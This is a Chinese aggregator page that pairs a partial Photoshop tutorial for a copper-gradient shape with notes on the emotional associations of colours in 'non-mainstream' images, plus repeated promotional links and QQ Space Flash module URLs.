★点击进入→免费实用电脑技术及维修总汇→(推荐) 

来源：网络

原图及新背景图：


过程：

 ★点击进入→ 免费QQ空间代码及素材总汇①（经典）

★点击进入→免费实用电脑技术及维修总汇(推荐)

 ★点击进入→免费实用电子技术教程汇总（经典） 

★点击进入→免费实用电子电路图大全（推荐）

 ★点击进入→免费网易博客代码教程大全（经典） 

来源：网络

先看效果图

 
第一步，建立合适尺寸的画布。个人比较喜欢大尺寸的，这样便于细节处理。

第二步，新建一个图层，用矩形选框绘制一个长方形，选择填充工具，在属性栏右击渐变编辑器，选择 铜色 渐变，将矩形填充。

第三步，保持矩形被选状态，使用直线选择工具，截取矩形的一部分（如图）。

第四步，按住ctrl键，点选该图形，选择 矩形选框工具 ，按住shift键及鼠标左键右平移一段距离，将选中部分删除，并保持目前状态。

第五步，向左稍稍移动一段距离，按 ctrl+M 键，快速选择 曲线 工具，将其亮度稍微调暗一些。

第六步，选择该图形左边一部分，使用曲线工具将亮度稍微调亮，可参照第五步。然后 ctrl+D 取消选择。

 ★点击进入→ 免费QQ空间代码及素材总汇①（经典）

★点击进入→免费实用电脑技术及维修总汇(推荐)

 ★点击进入→免费实用电子技术教程汇总（经典） 

★点击进入→免费实用电子电路图大全（推荐）

 ★点击进入→免费网易博客代码教程大全（经典） 

来源：网络

一、在非主流图片里，通常主色选用红色的话，代表一种色感温暖，性格刚烈而外向，是一种对人刺激性很强的色。红色容易引起人的注意，也容易使人兴奋、激动、紧张、冲动、还是一种容易造成人视觉疲劳的色。

　　1、在红色中加入少量的黄，会使其热力强盛，趋于躁动、不安。
　　2、在红色中加入少量的蓝，会使其热性减弱，趋于文雅、柔和。
　　3、在红色中加入少量的黑，会使其性格变的沉稳，趋于厚重、朴实。
　　4、在红中加入少量的白，会使其性格变的温柔，趋于含蓄、羞涩、娇嫩。

　　二、在非主流图片里，通常主色选用黄色代表一种冷漠、高傲、敏感、具有扩张和不安宁的视觉印象。黄色是各种色彩中，最为娇气的一种色。只要在纯黄色中混入少量的其它色，其色相感和色性格均会发生较大程度的变化。

　　1、 在黄色中加入少量的蓝，会使其转化为一种鲜嫩的绿色。其高傲的性格也随之消失，趋于一种平和、潮润的感觉。
　　2、 在黄色中加入少量的红，则具有明显的橙色感觉，其性格也会从冷漠、高傲转化为一种有分寸感的热情、温暖。
　　3、 在黄色中加入少量的黑，其色感和色性变化最大，成为一种具有明显橄榄绿的复色印象。其色性也变的成熟、随和。
　　4、 在黄色中加入少量的白，其色感变的柔和，其性格中的冷漠、高傲被淡化，趋于含蓄，易于接近。

　　三、 在非主流图片里，通常主色选用蓝色代表一种色感较冷，性格朴实而内向，是一种有助于人头脑冷静的颜色。蓝色的朴实、内向性格，常为那些性格活跃、具有较强扩张力的色彩，提供一个深 远、广埔、平静的空间，成为衬托活跃色彩的友善而谦虚的朋友。蓝色还是一种在淡化后仍然似能保持较强个性的色。如果在蓝色中分别加入少量的红、黄、黑、 橙、白等色，均不会对蓝色的性格构成较明显的影响力。

　　1、 如果在橙色中黄的成份较多，其性格趋于甜美、亮丽、芳香。
　　2、 在橙色中混入小量的白，可使橙色的知觉趋于焦躁、无力。

　　四、在非主流图片里，通常主色选用绿色是具有黄色和蓝色两种成份的色。在绿色中，将黄色的扩张感和蓝色的收缩感相中庸，将黄色的温暖感与蓝色的寒冷感相抵消。这样使得绿色的性格最为平和、安稳。是一种柔顺、恬静、潢足、优美的色。

　　1、 在绿色中黄的成份较多时，其性格就趋于活泼、友善，具有幼稚性。
　　2、 在绿色中加入少量的黑，其性格就趋于庄重、老练、成熟。
　　3、 在绿色中加入少量的白，其性格就趋于洁净、清爽、鲜嫩。

　　五、在非主流图片里，通常主色选用紫色的明度在有彩色的色料中是最低的。紫色的低明度给人一种沉闷、神秘的感觉。

　　1、 在紫色中红的成份较多时，其知觉具有压抑感、威胁感。
　　2、 在紫色中加入少量的黑，其感觉就趋于沉闷、伤感、恐怖。
　　3、 在紫色中加入白，可使紫色沉闷的性格消失，变得优雅、娇气，并充满女性的魅力。

　　六、在非主流图片里，通常主色选用白色的色感光明，性格朴实、纯洁、快乐。白色具有圣洁的不容侵犯性。如果在白色中加入其它任何色，都会影响其纯洁性，使其性格变的含蓄。

　　1、 在白色中混入少量的红，就成为淡淡的粉色，鲜嫩而充满诱惑。
　　2、 在白色中混入少量的黄，则成为一种乳黄色，给人一种香腻的印象。
　　3、 在白色中混入少量的蓝，给人感觉清冷、洁净。
　　4、 在白色中混入少量的橙，有一种干燥的气氛。
　　5、 在白色中混入少量的绿，给人一种稚嫩、柔和的感觉。
　　6、 在白色中混入少量的紫，可诱导人联想到淡淡的芳香。

 ★点击进入→ 免费QQ空间代码及素材总汇①（经典）

★点击进入→免费实用电脑技术及维修总汇(推荐)

 ★点击进入→免费实用电子技术教程汇总（经典） 

★点击进入→免费实用电子电路图大全（推荐）

 ★点击进入→免费网易博客代码教程大全（经典） 

来源：http://www.52vq.cn/

QQ空间FLASH模块：追寻以往的记忆

http://flash.52vq.cn/qq.swf?id=011962&.swf

★点击进入→ 免费QQ空间代码及素材总汇①（经典）

来源：http://www.52vq.cn/

http://flash.52vq.cn/qq.swf?id=052888&.swf

QQ空间FLASH模块：狂欢酒吧

 ★点击进入→ 免费QQ空间代码及素材总汇①（经典）

来源：http://www.52vq.cn/

非主流FLASH推荐情感模块

非主流FLASH  http://flash.52vq.cn/qq.swf?id=%30%35%30%37%38%31&.swf

 ★点击进入→ 免费QQ空间代码及素材总汇①（经典）